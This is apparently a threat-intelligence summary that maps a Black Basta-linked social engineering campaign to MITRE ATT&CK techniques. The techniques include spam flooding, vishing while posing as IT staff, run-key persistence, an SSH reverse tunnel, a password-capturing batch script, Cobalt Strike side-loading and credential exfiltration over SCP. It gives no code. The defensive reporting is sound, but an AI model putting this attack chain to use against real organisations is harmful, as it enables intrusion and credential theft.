Ongoing Social Engineering Campaign Tied to Black Basta Ransomware Operators

MITRE Techniques

• [T1498] Network Denial of Service – The threat actor overwhelms email protection solutions with spam. “The threat actor overwhelms email protection solutions with spam.”
• [T1566.004] Phishing: Spearphishing Voice – The threat actor calls impacted users and pretends to be a member of their organization’s IT team to gain remote access. “the threat actor calls impacted users posing as a member of their organization’s IT team reaching out to offer support for their email issues.”
• [T1059.003] Command and Scripting Interpreter: Windows Command Shell – The threat actor executes batch script after establishing remote access to a user’s asset. “The threat actor executes batch script after establishing remote access to a user’s asset.”
• [T1059.001] Command and Scripting Interpreter: PowerShell – Batch scripts used by the threat actor execute certain commands via PowerShell. “Batch scripts used by the threat actor execute certain commands via PowerShell.”
• [T1547.001] Boot or Logon Autostart Execution: Run Keys / Startup Folder – The threat actor creates a run key to execute a batch script via PowerShell, which then attempts to establish a reverse tunnel via SSH. “The threat actor creates a run key to execute a batch script via PowerShell, which then attempts to establish a reverse tunnel via SSH.”
• [T1222.001] File and Directory Permissions Modification – The threat actor uses cacls.exe via batch script to modify file permissions. “The threat actor uses cacls.exe via batch script to modify file permissions.”
• [T1140] Deobfuscate/Decode Files or Information – The threat actor encrypted several zip archive payloads with the password “qaz123”. “The threat actor encrypted several zip archive payloads with the password “qaz123”.”
• [T1056.001] Input Capture: Keylogging – The threat actor runs a batch script that records the user’s password via command line input. “The threat actor runs a batch script that records the user’s password via command line input.”
• [T1033] System Owner/User Discovery – The threat actor uses whoami.exe to evaluate if the impacted user is an administrator or not. “The threat actor uses whoami.exe to evaluate if the impacted user is an administrator or not.”
• [T1570] Lateral Tool Transfer – Impacket was used to move payloads between compromised systems. “Impacket was used to move payloads between compromised systems.”
• [T1572] Protocol Tunneling – An SSH reverse tunnel is used to provide the threat actor with persistent remote access. “An SSH reverse tunnel is used to provide the threat actor with persistent remote access.”
• [T1574.002] DLL Side-loading – The DLL was altered to XOR-decrypt the Cobalt Strike beacon and then execute it; side-loading via 7zG.exe to load 7z.DLL. “The DLL was altered to include a function whose purpose was to XOR-decrypt the Cobalt Strike beacon using a hard-coded key and then execute the beacon.”
• [T1041] Exfiltration: Exfiltration Over C2 Channel – Credentials are immediately exfiltrated to the threat actor’s server via SCP. “credentials are immediately exfiltrated to the threat actor’s server via a Secure Copy command (SCP).”